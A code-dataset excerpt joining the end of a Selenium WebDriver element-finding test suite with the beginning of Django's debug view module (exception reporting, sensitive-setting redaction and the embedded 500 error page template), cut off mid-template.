def test_finding_elements_on_element_by_xpath_should_find_top_level_elements(self):
self._load_simple_page()
parent = self.driver.find_element_by_id("multiline")
all_para_elements = self.driver.find_elements_by_xpath("//p")
children = parent.find_elements_by_xpath("//p")
self.assertEqual(len(all_para_elements), len(children))
def test_should_find_element_by_name(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
child = element.find_element_by_name("selectomatic")
self.assertEqual(child.get_attribute("id"), "2")
def test_should_find_elements_by_name(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
children = element.find_elements_by_name("selectomatic")
self.assertEqual(len(children), 2)
def test_should_find_element_by_id(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
child = element.find_element_by_id("2")
self.assertEqual(child.get_attribute("name"), "selectomatic")
def test_should_find_elements_by_id(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
child = element.find_elements_by_id("2")
self.assertEqual(len(child), 2)
def test_should_find_element_by_id_when_multiple_matches_exist(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_id("test_id_div")
child = element.find_element_by_id("test_id")
self.assertEqual(child.text, "inside")
def test_should_find_element_by_id_when_no_match_in_context(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_id("test_id_div")
try:
element.find_element_by_id("test_id_out")
self.fail("Expected NoSuchElementException to have been thrown")
except NoSuchElementException as e:
pass
def test_should_find_element_by_link_text(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("div1")
child = element.find_element_by_link_text("hello world")
self.assertEqual(child.get_attribute("name"), "link1")
def test_should_find_elements_by_link_text(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("div1")
children = element.find_elements_by_link_text("hello world")
self.assertEqual(len(children), 2)
self.assertEqual("link1", children[0].get_attribute("name"))
self.assertEqual("link2", children[1].get_attribute("name"))
def test_should_find_element_by_class_name(self):
self._load_page("nestedElements")
parent = self.driver.find_element_by_name("classes")
element = parent.find_element_by_class_name("one")
self.assertEqual("Find me", element.text)
def test_should_find_elements_by_class_name(self):
self._load_page("nestedElements")
parent = self.driver.find_element_by_name("classes")
elements = parent.find_elements_by_class_name("one")
self.assertEqual(2, len(elements))
def test_should_find_element_by_tag_name(self):
self._load_page("nestedElements")
parent = self.driver.find_element_by_name("div1")
element = parent.find_element_by_tag_name("a")
self.assertEqual("link1", element.get_attribute("name"))
def test_should_find_elements_by_tag_name(self):
self._load_page("nestedElements")
parent = self.driver.find_element_by_name("div1")
elements = parent.find_elements_by_tag_name("a")
self.assertEqual(2, len(elements))
def test_should_be_able_to_find_an_element_by_css_selector(self):
self._load_page("nestedElements")
parent = self.driver.find_element_by_name("form2")
element = parent.find_element_by_css_selector('*[name="selectomatic"]')
self.assertEqual("2", element.get_attribute("id"))
def test_should_be_able_to_find_multiple_elements_by_css_selector(self):
self._load_page("nestedElements")
parent = self.driver.find_element_by_name("form2")
elements = parent.find_elements_by_css_selector(
'*[name="selectomatic"]')
self.assertEqual(2, len(elements))
def test_should_throw_an_error_if_user_passes_in_integer(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_element(By.ID, 333333)
self.fail("_should have thrown _web_driver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_in_tuple(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_element((By.ID, 333333))
self.fail("_should have thrown _web_driver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_inNone(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_element(By.ID, None)
self.fail("_should have thrown _web_driver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_in_invalid_by(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_element("css", "body")
self.fail("_should have thrown _web_driver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_in_integer_when_find_elements(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_elements(By.ID, 333333)
self.fail("_should have thrown _web_driver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_in_tuple_when_find_elements(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_elements((By.ID, 333333))
self.fail("_should have thrown _web_driver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_inNone_when_find_elements(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_elements(By.ID, None)
self.fail("should have thrown webdriver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_in_invalid_by_when_find_elements(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_elements("css", "body")
self.fail("Should have thrown WebDriver Exception")
except InvalidSelectorException:
pass #_this is expected
def _page_url(self, name):
return self.webserver.where_is(name + '.html')
def _load_simple_page(self):
self._load_page("simpleTest")
def _load_page(self, name):
self.driver.get(self._page_url(name))
| apache-2.0 |
tayfun/django | django/views/debug.py | 44 | 46856 | from __future__ import unicode_literals
import re
import sys
import types
from django.conf import settings
from django.core.urlresolvers import Resolver404, resolve
from django.http import HttpResponse, HttpResponseNotFound
from django.template import Context, Engine, TemplateDoesNotExist
from django.template.defaultfilters import force_escape, pprint
from django.utils import lru_cache, six, timezone
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, smart_text
from django.utils.module_loading import import_string
from django.utils.translation import ugettext as _
# Minimal Django templates engine to render the error templates
# regardless of the project's TEMPLATES setting.
DEBUG_ENGINE = Engine(debug=True)
HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|SIGNATURE')
CLEANSED_SUBSTITUTE = '********************'
def linebreak_iter(template_source):
yield 0
p = template_source.find('\n')
while p >= 0:
yield p + 1
p = template_source.find('\n', p + 1)
yield len(template_source) + 1
class CallableSettingWrapper(object):
""" Object to wrap callable appearing in settings
* Not to call in the debug page (#21345).
* Not to break the debug page if the callable forbidding to set attributes (#23070).
"""
def __init__(self, callable_setting):
self._wrapped = callable_setting
def __repr__(self):
return repr(self._wrapped)
def cleanse_setting(key, value):
"""Cleanse an individual setting key/value of sensitive content.
If the value is a dictionary, recursively cleanse the keys in
that dictionary.
"""
try:
if HIDDEN_SETTINGS.search(key):
cleansed = CLEANSED_SUBSTITUTE
else:
if isinstance(value, dict):
cleansed = {k: cleanse_setting(k, v) for k, v in value.items()}
else:
cleansed = value
except TypeError:
# If the key isn't regex-able, just return as-is.
cleansed = value
if callable(cleansed):
# For fixing #21345 and #23070
cleansed = CallableSettingWrapper(cleansed)
return cleansed
def get_safe_settings():
"Returns a dictionary of the settings module, with sensitive settings blurred out."
settings_dict = {}
for k in dir(settings):
if k.isupper():
settings_dict[k] = cleanse_setting(k, getattr(settings, k))
return settings_dict
def technical_500_response(request, exc_type, exc_value, tb, status_code=500):
"""
Create a technical server error response. The last three arguments are
the values returned from sys.exc_info() and friends.
"""
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
if request.is_ajax():
text = reporter.get_traceback_text()
return HttpResponse(text, status=status_code, content_type='text/plain')
else:
html = reporter.get_traceback_html()
return HttpResponse(html, status=status_code, content_type='text/html')
@lru_cache.lru_cache()
def get_default_exception_reporter_filter():
# Instantiate the default filter for the first time and cache it.
return import_string(settings.DEFAULT_EXCEPTION_REPORTER_FILTER)()
def get_exception_reporter_filter(request):
default_filter = get_default_exception_reporter_filter()
return getattr(request, 'exception_reporter_filter', default_filter)
class ExceptionReporterFilter(object):
"""
Base for all exception reporter filter classes. All overridable hooks
contain lenient default behaviors.
"""
def get_post_parameters(self, request):
if request is None:
return {}
else:
return request.POST
def get_traceback_frame_variables(self, request, tb_frame):
return list(tb_frame.f_locals.items())
class SafeExceptionReporterFilter(ExceptionReporterFilter):
"""
Use annotations made by the sensitive_post_parameters and
sensitive_variables decorators to filter out sensitive information.
"""
def is_active(self, request):
"""
This filter is to add safety in production environments (i.e. DEBUG
is False). If DEBUG is True then your site is not safe anyway.
This hook is provided as a convenience to easily activate or
deactivate the filter on a per request basis.
"""
return settings.DEBUG is False
def get_cleansed_multivaluedict(self, request, multivaluedict):
"""
Replaces the keys in a MultiValueDict marked as sensitive with stars.
This mitigates leaking sensitive POST parameters if something like
request.POST['nonexistent_key'] throws an exception (#21098).
"""
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
multivaluedict = multivaluedict.copy()
for param in sensitive_post_parameters:
if param in multivaluedict:
multivaluedict[param] = CLEANSED_SUBSTITUTE
return multivaluedict
def get_post_parameters(self, request):
"""
Replaces the values of POST parameters marked as sensitive with
stars (*********).
"""
if request is None:
return {}
else:
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
cleansed = request.POST.copy()
if sensitive_post_parameters == '__ALL__':
# Cleanse all parameters.
for k, v in cleansed.items():
cleansed[k] = CLEANSED_SUBSTITUTE
return cleansed
else:
# Cleanse only the specified parameters.
for param in sensitive_post_parameters:
if param in cleansed:
cleansed[param] = CLEANSED_SUBSTITUTE
return cleansed
else:
return request.POST
def cleanse_special_types(self, request, value):
try:
# If value is lazy or a complex object of another kind, this check
# might raise an exception. isinstance checks that lazy
# MultiValueDicts will have a return value.
is_multivalue_dict = isinstance(value, MultiValueDict)
except Exception as e:
return '{!r} while evaluating {!r}'.format(e, value)
if is_multivalue_dict:
# Cleanse MultiValueDicts (request.POST is the one we usually care about)
value = self.get_cleansed_multivaluedict(request, value)
return value
def get_traceback_frame_variables(self, request, tb_frame):
"""
Replaces the values of variables marked as sensitive with
stars (*********).
"""
# Loop through the frame's callers to see if the sensitive_variables
# decorator was used.
current_frame = tb_frame.f_back
sensitive_variables = None
while current_frame is not None:
if (current_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in current_frame.f_locals):
# The sensitive_variables decorator was used, so we take note
# of the sensitive variables' names.
wrapper = current_frame.f_locals['sensitive_variables_wrapper']
sensitive_variables = getattr(wrapper, 'sensitive_variables', None)
break
current_frame = current_frame.f_back
cleansed = {}
if self.is_active(request) and sensitive_variables:
if sensitive_variables == '__ALL__':
# Cleanse all variables
for name, value in tb_frame.f_locals.items():
cleansed[name] = CLEANSED_SUBSTITUTE
else:
# Cleanse specified variables
for name, value in tb_frame.f_locals.items():
if name in sensitive_variables:
value = CLEANSED_SUBSTITUTE
else:
value = self.cleanse_special_types(request, value)
cleansed[name] = value
else:
# Potentially cleanse the request and any MultiValueDicts if they
# are one of the frame variables.
for name, value in tb_frame.f_locals.items():
cleansed[name] = self.cleanse_special_types(request, value)
if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in tb_frame.f_locals):
# For good measure, obfuscate the decorated function's arguments in
# the sensitive_variables decorator's frame, in case the variables
# associated with those arguments were meant to be obfuscated from
# the decorated function's frame.
cleansed['func_args'] = CLEANSED_SUBSTITUTE
cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE
return cleansed.items()
class ExceptionReporter(object):
"""
A class to organize and coordinate reporting on exceptions.
"""
def __init__(self, request, exc_type, exc_value, tb, is_email=False):
self.request = request
self.filter = get_exception_reporter_filter(self.request)
self.exc_type = exc_type
self.exc_value = exc_value
self.tb = tb
self.is_email = is_email
self.template_info = getattr(self.exc_value, 'template_debug', None)
self.template_does_not_exist = False
self.postmortem = None
# Handle deprecated string exceptions
if isinstance(self.exc_type, six.string_types):
self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type)
self.exc_type = type(self.exc_value)
def get_traceback_data(self):
"""Return a dictionary containing traceback information."""
if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist):
self.template_does_not_exist = True
self.postmortem = self.exc_value.chain or [self.exc_value]
frames = self.get_traceback_frames()
for i, frame in enumerate(frames):
if 'vars' in frame:
frame_vars = []
for k, v in frame['vars']:
v = pprint(v)
# The force_escape filter assume unicode, make sure that works
if isinstance(v, six.binary_type):
v = v.decode('utf-8', 'replace') # don't choke on non-utf-8 input
# Trim large blobs of data
if len(v) > 4096:
v = '%s... <trimmed %d bytes string>' % (v[0:4096], len(v))
frame_vars.append((k, force_escape(v)))
frame['vars'] = frame_vars
frames[i] = frame
unicode_hint = ''
if self.exc_type and issubclass(self.exc_type, UnicodeError):
start = getattr(self.exc_value, 'start', None)
end = getattr(self.exc_value, 'end', None)
if start is not None and end is not None:
unicode_str = self.exc_value.args[1]
unicode_hint = smart_text(
unicode_str[max(start - 5, 0):min(end + 5, len(unicode_str))],
'ascii', errors='replace'
)
from django import get_version
c = {
'is_email': self.is_email,
'unicode_hint': unicode_hint,
'frames': frames,
'request': self.request,
'filtered_POST': self.filter.get_post_parameters(self.request),
'settings': get_safe_settings(),
'sys_executable': sys.executable,
'sys_version_info': '%d.%d.%d' % sys.version_info[0:3],
'server_time': timezone.now(),
'django_version_info': get_version(),
'sys_path': sys.path,
'template_info': self.template_info,
'template_does_not_exist': self.template_does_not_exist,
'postmortem': self.postmortem,
}
# Check whether exception info is available
if self.exc_type:
c['exception_type'] = self.exc_type.__name__
if self.exc_value:
c['exception_value'] = smart_text(self.exc_value, errors='replace')
if frames:
c['lastframe'] = frames[-1]
return c
def get_traceback_html(self):
"Return HTML version of debug 500 HTTP error page."
t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEMPLATE)
c = Context(self.get_traceback_data(), use_l10n=False)
return t.render(c)
def get_traceback_text(self):
"Return plain text version of debug 500 HTTP error page."
t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEXT_TEMPLATE)
c = Context(self.get_traceback_data(), autoescape=False, use_l10n=False)
return t.render(c)
def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None):
"""
Returns context_lines before and after lineno from file.
Returns (pre_context_lineno, pre_context, context_line, post_context).
"""
source = None
if loader is not None and hasattr(loader, "get_source"):
try:
source = loader.get_source(module_name)
except ImportError:
pass
if source is not None:
source = source.splitlines()
if source is None:
try:
with open(filename, 'rb') as fp:
source = fp.read().splitlines()
except (OSError, IOError):
pass
if source is None:
return None, [], None, []
# If we just read the source from a file, or if the loader did not
# apply tokenize.detect_encoding to decode the source into a Unicode
# string, then we should do that ourselves.
if isinstance(source[0], six.binary_type):
encoding = 'ascii'
for line in source[:2]:
# File coding may be specified. Match pattern from PEP-263
# (http://www.python.org/dev/peps/pep-0263/)
match = re.search(br'coding[:=]\s*([-\w.]+)', line)
if match:
encoding = match.group(1).decode('ascii')
break
source = [six.text_type(sline, encoding, 'replace') for sline in source]
lower_bound = max(0, lineno - context_lines)
upper_bound = lineno + context_lines
pre_context = source[lower_bound:lineno]
context_line = source[lineno]
post_context = source[lineno + 1:upper_bound]
return lower_bound, pre_context, context_line, post_context
def get_traceback_frames(self):
def explicit_or_implicit_cause(exc_value):
explicit = getattr(exc_value, '__cause__', None)
implicit = getattr(exc_value, '__context__', None)
return explicit or implicit
# Get the exception and all its causes
exceptions = []
exc_value = self.exc_value
while exc_value:
exceptions.append(exc_value)
exc_value = explicit_or_implicit_cause(exc_value)
frames = []
# No exceptions were supplied to ExceptionReporter
if not exceptions:
return frames
# In case there's just one exception (always in Python 2,
# sometimes in Python 3), take the traceback from self.tb (Python 2
# doesn't have a __traceback__ attribute on Exception)
exc_value = exceptions.pop()
tb = self.tb if six.PY2 or not exceptions else exc_value.__traceback__
while tb is not None:
# Support for __traceback_hide__ which is used by a few libraries
# to hide internal frames.
if tb.tb_frame.f_locals.get('__traceback_hide__'):
tb = tb.tb_next
continue
filename = tb.tb_frame.f_code.co_filename
function = tb.tb_frame.f_code.co_name
lineno = tb.tb_lineno - 1
loader = tb.tb_frame.f_globals.get('__loader__')
module_name = tb.tb_frame.f_globals.get('__name__') or ''
pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file(
filename, lineno, 7, loader, module_name,
)
if pre_context_lineno is not None:
frames.append({
'exc_cause': explicit_or_implicit_cause(exc_value),
'exc_cause_explicit': getattr(exc_value, '__cause__', True),
'tb': tb,
'type': 'django' if module_name.startswith('django.') else 'user',
'filename': filename,
'function': function,
'lineno': lineno + 1,
'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame),
'id': id(tb),
'pre_context': pre_context,
'context_line': context_line,
'post_context': post_context,
'pre_context_lineno': pre_context_lineno + 1,
})
# If the traceback for current exception is consumed, try the
# other exception.
if six.PY2:
tb = tb.tb_next
elif not tb.tb_next and exceptions:
exc_value = exceptions.pop()
tb = exc_value.__traceback__
else:
tb = tb.tb_next
return frames
def format_exception(self):
"""
Return the same data as from traceback.format_exception.
"""
import traceback
frames = self.get_traceback_frames()
tb = [(f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames]
list = ['Traceback (most recent call last):\n']
list += traceback.format_list(tb)
list += traceback.format_exception_only(self.exc_type, self.exc_value)
return list
def technical_404_response(request, exception):
"Create a technical 404 error response. The exception should be the Http404."
try:
error_url = exception.args[0]['path']
except (IndexError, TypeError, KeyError):
error_url = request.path_info[1:] # Trim leading slash
try:
tried = exception.args[0]['tried']
except (IndexError, TypeError, KeyError):
tried = []
else:
if (not tried # empty URLconf
or (request.path == '/'
and len(tried) == 1 # default URLconf
and len(tried[0]) == 1
and getattr(tried[0][0], 'app_name', '') == getattr(tried[0][0], 'namespace', '') == 'admin')):
return default_urlconf(request)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
if isinstance(urlconf, types.ModuleType):
urlconf = urlconf.__name__
caller = ''
try:
resolver_match = resolve(request.path)
except Resolver404:
pass
else:
obj = resolver_match.func
if hasattr(obj, '__name__'):
caller = obj.__name__
elif hasattr(obj, '__class__') and hasattr(obj.__class__, '__name__'):
caller = obj.__class__.__name__
if hasattr(obj, '__module__'):
module = obj.__module__
caller = '%s.%s' % (module, caller)
t = DEBUG_ENGINE.from_string(TECHNICAL_404_TEMPLATE)
c = Context({
'urlconf': urlconf,
'root_urlconf': settings.ROOT_URLCONF,
'request_path': error_url,
'urlpatterns': tried,
'reason': force_bytes(exception, errors='replace'),
'request': request,
'settings': get_safe_settings(),
'raising_view_name': caller,
})
return HttpResponseNotFound(t.render(c), content_type='text/html')
def default_urlconf(request):
"Create an empty URLconf 404 error response."
t = DEBUG_ENGINE.from_string(DEFAULT_URLCONF_TEMPLATE)
c = Context({
"title": _("Welcome to Django"),
"heading": _("It worked!"),
"subheading": _("Congratulations on your first Django-powered page."),
"instructions": _("Of course, you haven't actually done any work yet. "
"Next, start your first app by running <code>python manage.py startapp [app_label]</code>."),
"explanation": _("You're seeing this message because you have <code>DEBUG = True</code> in your "
"Django settings file and you haven't configured any URLs. Get to work!"),
})
return HttpResponse(t.render(c), content_type='text/html')
#
# Templates are embedded in the file so that we know the error handler will
# always work even if the template loader is broken.
#
TECHNICAL_500_TEMPLATE = ("""
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}"""
"""{% if request %} at {{ request.path_info|escape }}{% endif %}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#666; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.context { padding:10px 0; overflow:hidden; }
div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; padding-left: 2px; }
div.context ol li pre { display:inline; }
div.context ol.context-line li { color:#505050; background-color:#dfdfdf; padding: 3px 2px; }
div.context ol.context-line li span { position:absolute; right:32px; }
.user div.context ol.context-line li { background-color:#bbb; color:#000; }
.user div.context ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555; text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 10px 20px; }
#template-not-exist .postmortem-section { margin-bottom: 3px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em;}
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
.append-bottom { margin-bottom: 10px; }
</style>
{% if not is_email %}
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
hideAll(getElementsByClassName(document, 'div', 'pastebin'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block': 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.innerHTML = s.innerHTML == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.innerHTML = link.innerHTML.trim() == s1 ? s2: s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
//-->
</script>
{% endif %}
</head>
<body>
<div id="summary">
<h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}"""
"""{% if request %} at {{ request.path_info|escape }}{% endif %}</h1>
<pre class="exception_value">"""
"""{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception message supplied{% endif %}"""
"""</pre>
<table class="meta">
{% if request %}
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% endif %}
<tr>
<th>Django Version:</th>
<td>{{ django_version_info }}</td>
</tr>
{% if exception_type %}
<tr>
<th>Exception Type:</th>
<td>{{ exception_type }}</td>
</tr>
{% endif %}
{% if exception_type and exception_value %}
<tr>
<th>Exception Value:</th>
<td><pre>{{ exception_value|force_escape }}</pre></td>
</tr>
{% endif %}
{% if lastframe %}
<tr>
<th>Exception Location:</th>
<td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td>
</tr>
{% endif %}
<tr>
<th>Python Executable:</th>
<td>{{ sys_executable|escape }}</td>
</tr>
<tr>
<th>Python Version:</th>
<td>{{ sys_version_info }}</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>{{ sys_path|pprint }}</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>{{server_time|date:"r"}}</td>
</tr>
</table>
</div>
{% if unicode_hint %}
<div id="unicode-hint">
<h2>Unicode error hint</h2>
<p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p>
</div>
{% endif %}
{% if template_does_not_exist %}
<div id="template-not-exist">
<h2>Template-loader postmortem</h2>
{% if postmortem %}
<p class="append-bottom">Django tried loading these templates, in this order:</p>
{% for entry in postmortem %}
<p class="postmortem-section">Using engine <code>{{ entry.backend.name }}</code>:</p>
<ul>
{% if entry.tried %}
{% for attempt in entry.tried %}
<li><code>{{ attempt.0.loader_name }}</code>: {{ attempt.0.name }} ({{ attempt.1 }})</li>
{% endfor %}
</ul>
{% else %}
<li>This engine did not provide a list of tried templates.</li>
{% endif %}
</ul>
{% endfor %}
{% else %}
<p>No templates were found because your 'TEMPLATES' setting is not configured.</p>
{% endif %}
</div>
{% endif %}
{% if template_info %}
<div id="template">
<h2>Error during template rendering</h2>
<p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p>
<h3>{{ template_info.message }}</h3>
<table class="source{% if template_info.top %} cut-top{% endif %}
{% ifnotequal template_info.bottom template_info.total %} cut-bottom{% endifnotequal %}">
{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
<tr class="error"><th>{{ source_line.0 }}</th>
<td>{{ template_info.before }}"""
"""<span class="specific">{{ template_info.during }}</span>"""
"""{{ template_info.after }}</td>
</tr>
{% else %}
<tr><th>{{ source_line.0 }}</th>
<td>{{ source_line.1 }}</td></tr>
{% endifequal %}
{% endfor %}
</table>
</div>
{% endif %}
{% if frames %}
<div id="traceback">
<h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);">
Switch to copy-and-paste view</a></span>{% endif %}
</h2>
{% autoescape off %}
<div id="browserTraceback">
<ul class="traceback">
{% for frame in frames %}
{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}
<li><h3>
{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}
</h3></li>
{% endif %}{% endifchanged %}
<li class="frame {{ frame.type }}">
<code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code>
{% if frame.context_line %}
<div class="context" id="c{{ frame.id }}">
{% if frame.pre_context and not is_email %}
<ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}">
{% for line in frame.pre_context %}
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>
{% endfor %}
</ol>
{% endif %}
<ol start="{{ frame.lineno }}" class="context-line">
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>
""" """{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol>
{% if frame.post_context and not is_email %}
<ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}">
{% for line in frame.post_context %}
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>
{% endfor %}
</ol>
{% endif %}
</div>
{% endif %}
{% if frame.vars %}
<div class="commands">
{% if is_email %}
<h2>Local Vars</h2>
{% else %}
<a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>▶</span> Local vars</a>
{% endif %}
</div>
<table class="vars" id="v{{ frame.id }}">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in frame.vars|dictsort:"0" %}
<tr>
<td>{{ var.0|force_escape }}</td>
<td class="code"><pre>{{ var.1 }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
</li>
{% endfor %}
</ul>
</div>
{% endautoescape %}
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
{% if not is_email %}
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title"
value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri|escape }}
{% endif %}
Django Version: {{ django_version_info }}
Python Version: {{ sys_version_info }}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader postmortem
{% if postmortem %}Django tried loading these templates, in this order:
{% for entry in postmortem %}
Using engine {{ entry.backend.name }}:
{% if entry.tried %}{% for attempt in entry.tried %} * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
{% endfor %}{% else %} This engine did not provide a list of tried templates.
{% endif %}{% endfor %}
